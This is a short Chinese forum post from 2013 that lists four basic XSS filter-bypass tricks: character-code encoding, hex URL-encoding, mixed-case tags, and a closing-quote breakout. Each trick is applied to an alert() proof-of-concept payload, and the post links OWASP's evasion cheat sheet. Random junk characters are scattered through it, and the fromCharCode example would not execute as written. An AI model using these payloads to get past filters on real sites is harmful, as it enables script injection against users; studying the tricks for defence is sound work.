四种超级基础的绕过方法。( x' r# T: o/ i* O* \ }2 c
1.转换为ASCII码
/ E) ~) E. Z- L例子:原脚本为<script>alert(‘I love F4ck’)</script >5 K l. ]7 k6 p
通过转换,变成:( q) d8 ^0 M- j' R
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
( k i1 z+ w7 r$ w9 h {' E/ C; r . o; X$ D" t1 P! |5 C. t
2.转换为HEX(十六进制)% h0 C& q$ ^' C; ~/ N$ |$ \2 U( B% q
例子:原脚本为<script>alert(‘I love F4ck’)</script>
- j: E1 R' i% i3 a [通过转换,变成:0 r7 j5 B9 \+ k! ~
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e( j0 T8 N( c/ x3 R* m$ p& d
- r1 f. N8 k/ e3 I3 x0 F8 S3 S4 ^3.转换脚本的大小写
* B' z* x; N* f: r u例子:原脚本为<script>alert(‘I love F4ck’)</script>
& ^" G& r, E4 v转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
5 J0 `) g/ D3 v; g1 O$ ^' O3 e 3 k w) {; T; |. e c% Z
4.增加闭合标记”>
& J; W/ P! c' ^例子:原脚本为<script>alert(‘I love F4ck’)</script>& C4 f" v) a. N; C+ O
转换为:”><script>alert(‘I love F4ck’)</script>+ `/ L" A# |0 V ?: D# |
更详细绕过技术请参考此网页
( r' j0 T: x; U5 Lhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
( c* Y0 y% t7 S( ^ / |% R9 z7 }& u( q5 ~6 q) T0 ~
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对